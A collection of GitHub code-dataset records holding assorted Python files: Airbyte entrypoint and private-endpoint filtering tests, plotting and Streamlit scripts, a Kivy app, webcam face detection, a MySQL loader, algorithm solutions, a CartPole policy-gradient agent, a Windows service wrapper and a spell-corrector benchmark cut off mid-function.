list(entrypoint.run(parsed_args))\n\n assert [_wrap_message(expected), MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n assert spec_mock.called\n\n\ndef test_run_read_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_invalid_command(entrypoint: AirbyteEntrypoint, config_mock):\n with pytest.raises(Exception):\n list(entrypoint.run(Namespace(command=\"invalid\", config=\"conf\")))\n\n\n@pytest.mark.parametrize(\n \"deployment_mode, url, expected_error\",\n [\n pytest.param(\"CLOUD\", \"https://airbyte.com\", None, id=\"test_cloud_public_endpoint_is_successful\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30\", ValueError, id=\"test_cloud_private_ip_address_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://localhost:8080/api/v1/cast\", ValueError, id=\"test_cloud_private_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"http://past.lives.net/api/v1/inyun\", ValueError, id=\"test_cloud_unsecured_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://not:very/cash:443.money\", ValueError, id=\"test_cloud_invalid_url_format\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30 \", ValueError, id=\"test_cloud_incorrect_ip_format_is_rejected\"),\n pytest.param(\"cloud\", \"https://192.168.27.30\", ValueError, id=\"test_case_insensitive_cloud_environment_variable\"),\n pytest.param(\"OSS\", \"https://airbyte.com\", None, id=\"test_oss_public_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://192.168.27.30\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://localhost:8080/api/v1/cast\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"http://past.lives.net/api/v1/inyun\", None, id=\"test_oss_unsecured_endpoint_is_successful\"),\n ],\n)\n@patch.object(requests.Session, \"send\", lambda self, request, **kwargs: requests.Response())\ndef test_filter_internal_requests(deployment_mode, url, expected_error):\n with mock.patch.dict(os.environ, {\"DEPLOYMENT_MODE\": deployment_mode}, clear=False):\n AirbyteEntrypoint(source=MockSource())\n\n session = requests.Session()\n\n prepared_request = requests.PreparedRequest()\n prepared_request.method = \"GET\"\n prepared_request.headers = {\"header\": \"value\"}\n prepared_request.url = url\n\n if expected_error:\n with pytest.raises(expected_error):\n session.send(request=prepared_request)\n else:\n actual_response = session.send(request=prepared_request)\n assert isinstance(actual_response, requests.Response)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-cdk/python/unit_tests/test_entrypoint.py","file_name":"test_entrypoint.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"}
+{"seq_id":"30731504869","text":"\"\"\"\nThis is the source file for the example spectrum. It has the dependencies of\nusing LaTeX with matplotlib. (See https://matplotlib.org/users/usetex.html) If\na LaTeX independent version is desired, simply comment out the line\nplt.rc('text', usetex=True)\n\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\n\nimport lrspectrum\n\n\n# Get multiple logfiles\nlglst = []\nfor fil in os.listdir('.'):\n rexp = re.compile('example_\\d.log')\n if rexp.match(fil) is not None:\n lglst.append(fil)\n\nlr = lrspectrum.LRSpectrum(lglst)\nlr.gen_spect(broad=1.0, wlim=(1530, 1570), res=200)\n\n# Plotting options\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nplt.rc('xtick', top=True, direction='in')\nplt.rc('xtick.major', size=4.5, pad=7)\nplt.rc('xtick.minor', visible=True)\nplt.rc('ytick', right=True, direction='in')\nplt.rc('ytick.major', size=4.5)\nplt.rc('ytick.minor', visible=True)\n\nf, ax = plt.subplots(figsize=(4.25, 3.25))\nlr.plot(ax=ax, xlim=(1555, 1575), xshift=23, ylabel='Intensity (Arb.)',\n xlabel='Energy (eV)', yscale=1000, sticks=False, ylim=(0, 3), ls='-',\n c='k', lw=1.5)\n# Doing labels outside for fontsize\nax.set_xlabel('Energy (eV)', fontsize=14)\nax.set_ylabel('Intensity (Arb.)', fontsize=14)\n'''\nax.set_xticklabels(['1555', '', '1556', '', '1557', '', '1558', '', '1559', '',\n '1560', '', '1561', '', '1562', '', '1563', '', '1564', '',\n '1565', '', '1566', '', '1567', '', '1568', '', '1569', '',\n '1570']\n ) \n'''\nax.set_xticklabels([str(i) for i in range(1555, 1571)])\nax.set_title('Calculated Aluminum K-Edge', fontsize=16, fontweight='bold')\nplt.tight_layout()\nplt.savefig('aluminumKedge.png', dpi=500)\nplt.show()\n","repo_name":"awild82/lrspectrum","sub_path":"doc/media/example_graph.py","file_name":"example_graph.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"18037319669","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\nfrom kivy.uix.widget import Widget\nfrom kivy.config import Config \nfrom socket import *\nfrom kivy.graphics import Rectangle\n\nf1,f2,f3 = False, False, False\n\nclass testWidget(Widget):\n\tdef on_touch_down(self,touch):\n\t\tglobal f1,f2,f3\n\t\tif 'markerid' in touch.profile:\n\t\t\tif touch.fid==2:\n\t\t\t\tf1=True\n\t\t\t\tprint(\"yes1\")\n\t\t\t\t\n\t\t\tif touch.fid==4:\n\t\t\t\tf2=True\n\t\t\t\tprint(\"yes2\")\n\t\t\t\t\n\t\t\tif f1 and f2:\n\t\t\t\twith self.canvas.before:\n\t\t\t\t\tRectangle(source=\"Map2.jpg\",pos=self.pos,size=self.size)\nclass Shortest_pathApp(App):\n\tdef build(self):\n\t\tConfig.set('input','fid1','tuio,0.0.0.0:3333')\n\t\treturn testWidget()\n\n\t\nif __name__ == '__main__':\n\tShortest_pathApp().run()\n","repo_name":"aliasgar521/KivyProject","sub_path":"Shortest path/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"897632162","text":"import cv2, os\n\ncascPath = r\"C:\\Users\\Administrator\\Desktop\\FaceDetection\\haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nlive = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = live.read()\n\n # Converting frame to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # using haarcascade\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE)\n\n os.system(\"cls\")\n print(\"Detected {0} faces!\".format(len(faces)))\n\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces Detected\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the capture\nlive.release()\ncv2.destroyAllWindows()","repo_name":"karan10072002/face_detection","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"44052922959","text":"__author__ = 'mirko'\n\nfrom sklearn.externals import joblib\nfrom Tweet import make_tweet\nimport os.path\nimport pymysql\nimport config as cfg\n\nclass Database_manager(object):\n\n db=None\n cur=None\n\n def __init__(self):\n\n self.db = pymysql.connect(host=cfg.mysql['host'],\n user=cfg.mysql['user'],\n passwd=cfg.mysql['passwd'],\n db=cfg.mysql['db'],\n charset='utf8')\n self.cur = self.db.cursor()\n self.cur.execute('SET NAMES utf8mb4')\n self.cur.execute(\"SET CHARACTER SET utf8mb4\")\n self.cur.execute(\"SET character_set_connection=utf8mb4\")\n self.db.commit()\n\n def return_test(self):\n\n\n if os.path.isfile('test.pkl') :\n tweets= joblib.load('test.pkl')\n return tweets\n\n\n tweets=[]\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `test \")\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'test.pkl')\n\n return tweets\n\n\n\n def return_training(self, language=None):\n\n if language==\"ca\" or language==\"es\":\n filter=\" where language='\"+language+\"'\"\n else:\n filter=\"\"\n\n\n if os.path.isfile('training'+filter+'.pkl') :\n tweets= joblib.load('training'+filter+'.pkl')\n return tweets\n\n\n tweets=[]\n\n\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `training` \"+filter)\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'training'+filter+'.pkl')\n\n return tweets\n\n\n\n\n\ndef make_database_manager():\n database_manager = Database_manager()\n\n return database_manager\n\n\nif __name__ == '__main__':\n database_manager = Database_manager()\n tweets=database_manager.return_training()\n\n","repo_name":"mirkolai/iTACOS-at-IberEval2017","sub_path":"Database_manager.py","file_name":"Database_manager.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35706654490","text":"#import libraries\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport streamlit as st\nimport numpy as np\nimport matplotlib\n#matplotlib.use('Agg')\nimport seaborn as sns \n#Remove Warnings\nst.balloons()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.title(\"District_Level_School_Dataset\")\n\n#import dataset\ndf = pd.read_csv('DistrictLevelData_V3.csv')\n\n#First thirty rows\nattendance = df.head(30)\n#Display the table\nst.table(attendance)\nst.header(\"Visualisation Using Seaborn\")\n#bar plot\nst.subheader(\"Bar Plot\")\nattendance.plot(kind='bar')\nst.pyplot()\n#pairplot\nst.subheader(\"Pairplot\")\nsns.pairplot(attendance,)\nst.pyplot()\n#Displot\nst.subheader(\"Displot\")\nsns.displot(attendance['CovidTotalStateCases'])\nst.pyplot()\n#joinplot\nst.subheader(\"JointPlot\")\nsns.jointplot(x='Mem',y='AttendancePercent',data=attendance,kind='hex',color=\"#4CB391\")\nst.pyplot()\n\n#Correation\nst.subheader(\"Heatmap\")\nsns.heatmap(attendance.corr(),cmap='coolwarm',annot=True)\nst.pyplot()\n#Replot\nst.subheader(\"RelPlot\")\nsns.relplot(x='CovidTotalStateCases',y='CovidTotalCountyCases',hue='Weekday', data=attendance)\nst.pyplot()\n\n ","repo_name":"sangeethar25/geeth_assignment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"4957267266","text":"# print square roots in Python language. R. Brown, 9/2010 \n\nfrom math import sqrt\n\n\ndef factorial(x):\n\tresult=1\n\ti=1\n\twhile (i>=1 and i<(n+1)):\n\t\tresult=result*i\n\t\ti=i+1\n\n\treturn result\n\nprint(\"n\\tn!\\n----------------\")\nn=0\nwhile (n<6):\n print(n,\"\\t\",factorial(n))\n n=n+1","repo_name":"kalapathar/hardware_design","sub_path":"hw7/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26902080174","text":"import os\nimport subprocess\nimport copy \nimport socket\nimport win32serviceutil\n\nimport servicemanager\nimport win32event\nimport win32service\nimport sys\nfrom winreg import *\nimport winreg\n\nfrom loggers import logger\n\n# get path from registry stored for the application by the installer\n\nWORKING_DIR = os.path.abspath(__file__)\nlogger.info(WORKING_DIR) \n\n\nENVIRONMENT = copy.deepcopy(os.environ)\n\n\nclass SalesOrderBookService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"SalesOrderBookService\"\n _svc_display_name_ = \"SALES_ORDER_BOOK_SERVICE\"\n _svc_description_ = \"Pushes sales order book changes every hour\"\n\n\n @classmethod\n def parse_command_line(cls):\n win32serviceutil.HandleCommandLine(cls)\n\n def __init__(self, *args):\n super().__init__(*args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n\n def SvcStop(self):\n self.stop()\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n \n def SvcDoRun(self):\n self.start()\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_, ''))\n self.main()\n\n def start(self):\n logger.info(\"starting service\")\n\n def stop(self):\n logger.info(\"stopping service\")\n\n\n def main(self):\n logger.info(\"running service\")\n subprocess.Popen(['python', 'main.py'], env=ENVIRONMENT)\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(SalesOrderBookService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n win32serviceutil.HandleCommandLine(SalesOrderBookService)","repo_name":"nakamura9/sync_service","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"38427395931","text":"\"\"\"\n城市用一个 双向连通 图表示,图中有 n 个节点,从 1 到 n 编号(包含 1 和 n)。图中的边用一个二维整数数组 edges 表示,其中每个 edges[i] = [ui, vi] 表示一条节点 ui 和节点 vi 之间的双向连通边。每组节点对由 最多一条 边连通,顶点不存在连接到自身的边。穿过任意一条边的时间是 time 分钟。\n\n每个节点都有一个交通信号灯,每 change 分钟改变一次,从绿色变成红色,再由红色变成绿色,循环往复。所有信号灯都 同时 改变。你可以在 任何时候 进入某个节点,但是 只能 在节点 信号灯是绿色时 才能离开。如果信号灯是 绿色 ,你 不能 在节点等待,必须离开。\n\n第二小的值 是 严格大于 最小值的所有值中最小的值。\n 例如,[2, 3, 4] 中第二小的值是 3 ,而 [2, 2, 4] 中第二小的值是 4 。\n\n给你 n、edges、time 和 change ,返回从节点 1 到节点 n 需要的 第二短时间 。\n\n注意:\n 你可以 任意次 穿过任意顶点,包括 1 和 n 。\n 你可以假设在 启程时 ,所有信号灯刚刚变成 绿色 。\n\n示例 1:\n 输入:n = 5, edges = [[1,2],[1,3],[1,4],[3,4],[4,5]], time = 3, change = 5\n 输出:13\n 解释:\n 上面的左图展现了给出的城市交通图。\n 右图中的蓝色路径是最短时间路径。\n 花费的时间是:\n - 从节点 1 开始,总花费时间=0\n - 1 -> 4:3 分钟,总花费时间=3\n - 4 -> 5:3 分钟,总花费时间=6\n 因此需要的最小时间是 6 分钟。\n\n 右图中的红色路径是第二短时间路径。\n - 从节点 1 开始,总花费时间=0\n - 1 -> 3:3 分钟,总花费时间=3\n - 3 -> 4:3 分钟,总花费时间=6\n - 在节点 4 等待 4 分钟,总花费时间=10\n - 4 -> 5:3 分钟,总花费时间=13\n 因此第二短时间是 13 分钟。 \n\n示例 2:\n 输入:n = 2, edges = [[1,2]], time = 3, change = 2\n 输出:11\n 解释:\n 最短时间路径是 1 -> 2 ,总花费时间 = 3 分钟\n 最短时间路径是 1 -> 2 -> 1 -> 2 ,总花费时间 = 11 分钟\n\n提示:\n 2 <= n <= 10^4\n n - 1 <= edges.length <= min(2 * 10^4, n * (n - 1) / 2)\n edges[i].length == 2\n 1 <= ui, vi <= n\n ui != vi\n 不含重复边\n 每个节点都可以从其他节点直接或者间接到达\n 1 <= time, change <= 10^3\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def secondMinimum(self, n: int, edges: List[List[int]], time: int, change: int) -> int:\n graph = [[] for _ in range(n + 1)]\n for e in edges:\n x, y = e[0], e[1]\n graph[x].append(y)\n graph[y].append(x)\n\n # dist[i][0] 表示从 1 到 i 的最短路长度,dist[i][1] 表示从 1 到 i 的严格次短路长度\n dist = [[float('inf')] * 2 for _ in range(n + 1)]\n dist[1][0] = 0\n q = deque([(1, 0)])\n while dist[n][1] == float('inf'):\n p = q.popleft()\n for y in graph[p[0]]:\n d = p[1] + 1\n if d < dist[y][0]:\n dist[y][0] = d\n q.append((y, d))\n elif dist[y][0] < d < dist[y][1]:\n dist[y][1] = d\n q.append((y, d))\n\n ans = 0\n for _ in range(dist[n][1]):\n if ans % (change * 2) >= change:\n ans += change * 2 - ans % (change * 2)\n ans += time\n return ans\n\nif __name__ == \"__main__\":\n n = 5\n edges = [[1,2],[1,3],[1,4],[3,4],[4,5]]\n time = 3\n change = 5\n sol = Solution()\n result = sol.secondMinimum(n, edges, time, change)\n print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/3_hard/2045_到达目的地的第二短时间.py","file_name":"2045_到达目的地的第二短时间.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"74113258980","text":"#!/usr/bin/env python3\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import *\nimport sys\n\nenv = gym.make('CartPole-v0')\n\nRNG_SEED = 1\ntf.set_random_seed(RNG_SEED)\nenv.seed(RNG_SEED)\n\nalpha = 0.0001\ngamma = 0.99\n\nw_init = xavier_initializer(uniform=False)\nb_init = tf.constant_initializer(0.1)\n\ntry:\n output_units = env.action_space.shape[0]\nexcept AttributeError:\n output_units = env.action_space.n\n\ninput_shape = env.observation_space.shape[0]\nNUM_INPUT_FEATURES = 4\nx = tf.placeholder(tf.float32, shape=(None, NUM_INPUT_FEATURES), name='x')\ny = tf.placeholder(tf.float32, shape=(None, output_units), name='y')\n\nout = fully_connected(inputs=x,\n num_outputs=output_units,\n activation_fn=tf.nn.softmax,\n weights_initializer=w_init,\n weights_regularizer=None,\n biases_initializer=b_init,\n scope='fc')\n\nall_vars = tf.global_variables()\n\npi = tf.contrib.distributions.Bernoulli(p=out, name='pi')\npi_sample = pi.sample()\nlog_pi = pi.log_prob(y, name='log_pi')\n\nReturns = tf.placeholder(tf.float32, name='Returns')\noptimizer = tf.train.GradientDescentOptimizer(alpha)\ntrain_op = optimizer.minimize(-1.0 * Returns * log_pi)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nMEMORY = 25\nMAX_STEPS = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n\n\ntrack_steps = []\ntrack_returns = []\n\n# For LaTeX plotting\nw1_plot = ''\nw2_plot = ''\nw3_plot = ''\nw4_plot = ''\nw5_plot = ''\nw6_plot = ''\nw7_plot = ''\nw8_plot = ''\nreturns_plot = ''\nsteps_plot = ''\n\nfor ep in range(2001):\n obs = env.reset()\n\n G = 0\n ep_states = []\n ep_actions = []\n ep_rewards = [0]\n done = False\n t = 0\n I = 1\n while not done:\n ep_states.append(obs)\n env.render()\n action = sess.run([pi_sample], feed_dict={x: [obs]})[0][0]\n ep_actions.append(action)\n obs, reward, done, info = env.step(action[0])\n ep_rewards.append(reward * I)\n G += reward * I\n I *= gamma\n\n t += 1\n if t >= MAX_STEPS:\n break\n\n returns = np.array([G - np.cumsum(ep_rewards[:-1])]).T\n index = ep % MEMORY\n\n print(np.array(ep_states))\n\n _ = sess.run([train_op], feed_dict={x: np.array(ep_states),\n y: np.array(ep_actions),\n Returns: returns})\n\n track_steps.append(t)\n track_steps = track_steps[-MEMORY:]\n mean_steps = np.mean(track_steps)\n\n track_returns.append(G)\n track_returns = track_returns[-MEMORY:]\n mean_return = np.mean(track_returns)\n\n print(\"Episode {} finished after {} steps with return {}\".format(ep, t, G))\n print(\"Mean return over the last {} episodes is {}\".format(MEMORY, mean_return))\n print(\"Mean number of steps over the last {} episodes is {}\".format(MEMORY, mean_steps))\n\n with tf.variable_scope('fc', reuse=True):\n weights = sess.run(tf.get_variable('weights'))\n print(\"Weights:\")\n print(weights)\n\n if ep % 20 == 0:\n w1_plot += str((ep, weights[0, 0]))\n w2_plot += str((ep, weights[0, 1]))\n w3_plot += str((ep, weights[1, 0]))\n w4_plot += str((ep, weights[1, 1]))\n w5_plot += str((ep, weights[2, 0]))\n w6_plot += str((ep, weights[2, 1]))\n w7_plot += str((ep, weights[3, 0]))\n w8_plot += str((ep, weights[3, 1]))\n returns_plot += str((ep, mean_return))\n steps_plot += str((ep, mean_steps))\n\nprint('w1:', w1_plot)\nprint('w2:', w2_plot)\nprint('w3:', w3_plot)\nprint('w4:', w4_plot)\nprint('w5:', w5_plot)\nprint('w6:', w6_plot)\nprint('w7:', w7_plot)\nprint('w8:', w8_plot)\nprint('returns:', returns_plot)\nprint('steps:', steps_plot)\n\nsess.close()\n","repo_name":"azmsu/reinforcement-learning","sub_path":"cartpole-reinforce.py","file_name":"cartpole-reinforce.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"22802606247","text":"#!../python35/python.exe\nprint (\"Content-type: text/html\\n\")\nimport cgi\nimport cgitb; cgitb.enable()\nform = cgi.FieldStorage()\nnombre = form.getfirst(\"nombre\");\ndificuldad = form.getfirst(\"dificuldad\");\npocision = form.getfirst(\"pocision\");\nelementos = form.getfirst(\"elementos\");\nreloj = form.getfirst(\"reloj\");\ntiempo_juego = form.getfirst(\"tiempo_juego\");\ntiempo_jugada = form.getfirst(\"tiempo_jugada\");\ntiempo_multinivel = form.getfirst(\"tiempo_multinivel\");\n\n\ncolor = form.getfirst(\"fcolor\");\n\n\nconfig = open(\"datos/config.dat\",\"w\")\n\nconfig.write(nombre+\",\"+dificuldad+\",\"+pocision+\",\"+elementos+\",\"+reloj+\",\"+tiempo_jugada+\",\"+tiempo_juego+\",\"+tiempo_multinivel+\",\"+color)\n\nprint('''''')","repo_name":"cecilianogranados96/Proyecto-Iphone","sub_path":"MasterMind/process_config.py","file_name":"process_config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"44309123973","text":"### this script convert a config.dat file to produce output files 'mycal.in' and 'radius.dat'.\n\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('config.dat',header=None,skiprows=0)\n\nradius=df.iloc[0].tolist()[0].split()[-3]\n\nf=open('radius.dat','w')\nf.write(str(radius+'\\n'))\nf.close()\n\nf=open('mycal.in','w')\nf.write('** total number of varaibles'+'\\n')\nf.write('** data begins from line 27 and onwards'+'\\n')\nf.write('** the rest are all dummies'+'\\n')\n\nfor i in range(4,27):\n f.write('**'+'\\n')\n \ncount=0 \nfor i in range(len(df)):\n line=df.iloc[i].tolist()[0]\n x=line.split()[0]\n y=line.split()[1]\n z=line.split()[2]\n count=count+1;\n state='variable '+ str(count) + ' ' + x\n #print(state)\n f.write(state+'\\n')\n \n count=count+1;\n #print(count,y);\n state='variable '+ str(count) + ' ' + y\n #print(state)\n f.write(state+'\\n')\n \n count=count+1\n #print(count,z);\n state='variable '+ str(count) + ' ' + z\n #print(state)\n f.write(state+'\\n')\nf.write('end'+'\\n')\t\nf.close()\n \n\n","repo_name":"tlyoon/mock-data-generation","sub_path":"convert_config.dat2mycal.in.py","file_name":"convert_config.dat2mycal.in.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"39617524529","text":"from prelogging import LCDict\nimport logging\n\nKEYWORD = 'my_keyword'\n\n# \"class formatter\"\n\nclass MyFormatter(logging.Formatter):\n def __init__(self, **kwargs):\n self.value=kwargs.pop(KEYWORD, '')\n kwargs.pop('class', None)\n s = super(MyFormatter, self).__init__(**kwargs)\n\n def format(self, logrecord, *args, **kwds):\n message = super(MyFormatter, self).format(logrecord, *args, **kwds)\n return 'MyFormatter [%r: %r] says: %s' % (KEYWORD, self.value, message)\n\n\nif __name__ == '__main__':\n lcd = LCDict(attach_handlers_to_root=True)\n lcd.add_formatter( 'my_formatter',\n format='%(name)s - %(levelname)s - %(message)s',\n # dateformat=...,\n # style=?,\n ** {'()': MyFormatter,\n KEYWORD: 'my_value'} )\n lcd.add_stdout_handler('out', formatter='my_formatter')\n lcd.config()\n\n root = logging.getLogger()\n root.debug(\"Debug.\")\n root.info(\"Info.\")\n root.warning(\"Warning.\")\n root.error(\"Error.\")\n root.critical(\"Critical.\")\n \"\"\"\n MyFormatter ['my_keyword': 'my_value'] says: root - WARNING - Warning.\n MyFormatter ['my_keyword': 'my_value'] says: root - ERROR - Error.\n MyFormatter ['my_keyword': 'my_value'] says: root - CRITICAL - Critical.\n \"\"\"\n","repo_name":"Twangist/prelogging","sub_path":"examples/custom_class_formatter.py","file_name":"custom_class_formatter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
+{"seq_id":"42465381709","text":"import sys\n\ndef candies(n, arr):\n # Complete this function\n candies = [1]*n\n # forward check\n for i in range(1, len(arr)):\n # determine candies[i] by comparison\n if arr[i] > arr[i-1]:\n candies[i] = candies[i-1] + 1\n # backward check\n for j in range(len(arr)-2, -1, -1):\n if arr[j] > arr[j+1] and candies[j] <= candies[j+1]:\n candies[j] = candies[j+1] + 1\n \n return sum(candies)\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n arr = []\n arr_i = 0\n for arr_i in range(n):\n arr_t = int(input().strip())\n arr.append(arr_t)\n result = candies(n, arr)\n print(result)","repo_name":"seLain/codesnippets","sub_path":"python3/hackerrank_leetcode/candies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"72356709222","text":"# coding=utf-8\n#!/usr/bin/python3\n\n''' Measure metrics (5 tests average) from spellcorrector.py, with several operation modes\n\nIndicates several metrics (avarage) for each operation mode (\"Manual\", Aspell, Hunspell and\nSymspell):\n * True Positives Wrong\n * True Positives Right\n * True Negatives\n * False Positives\n * False Negatives\n * Accuracy\n * Precision\n * Recall\n * Harmonic Mean\n * True Positives Rate\n * False Positives Rate\n * Execution Duration (sec)\n'''\n\nimport sys\nimport time\nimport fileinput\n\nimport regex\nimport numpy as np\nfrom prettytable import PrettyTable\n\nimport spellcorrector\n\ndef is_word(token):\n \"Indicates if token is a `word`.\"\n return bool(regex.search(r'\\w+', token, flags=regex.UNICODE))\n\ndef process_token(token):\n \"Process token.\"\n if len(token) <= 3:\n n_changes = np.random.choice([0, 1], p=[3.0/4.0, 1.0/4.0])\n else:\n n_changes = np.random.choice([0, 1, 2], p=[3.0/4.0, 0.8/4.0, 0.2/4.0])\n\n changes = np.random.choice([1, 2, 3, 4], size=(n_changes))\n for change in changes:\n if change == 1: # delete\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token))\n token = token[0:i_rand] + token[i_rand+1:]\n elif change == 2: # transposes (i <-> i+1)\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token)-1)\n token = token[0:i_rand] + token[i_rand+1] + token[i_rand] + token[i_rand+2:]\n elif change == 3: # replaces\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand+1:]\n else: # inserts\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand:]\n return token\n\n\ndef gen_text_with_errors(tokens):\n \"Generate text with errors, from `tokens` list.\"\n errors_tokens = []\n for token in tokens:\n if is_word(token) and len(token) > 1:\n errors_tokens.append(process_token(token))\n else:\n errors_tokens.append(token)\n\n return ''.join(errors_tokens)\n\n\ndef classification(original_word, errors_word, corrected_word):\n \"Classify spell correction as TPW, TPR, TN, FP or FN.\"\n # True Positives\n if original_word != errors_word and errors_word != corrected_word:\n # Correção errada\n if original_word != corrected_word:\n return 'TPW'\n # Correção correta\n return 'TPR'\n # True Negatives\n if original_word == errors_word and errors_word == corrected_word:\n return 'TN'\n # False Positives\n if original_word == errors_word and errors_word != corrected_word:\n return 'FP'\n # False Negatives\n if original_word != errors_word and errors_word == corrected_word:\n return 'FN'\n return None\n\n\ndef get_wrong_texts(n_tests, original_tokens):\n \"Get `n_tests` texts with errors.\"\n wrong_texts = []\n with open('metrics_errors.txt', 'w+') as file_desc:\n for i in range(n_tests):\n errors_text = gen_text_with_errors(original_tokens)\n wrong_texts.append(errors_text)\n print(f'\\n-- TESTE {i} --', file=file_desc)\n print(errors_text, file=file_desc)\n return 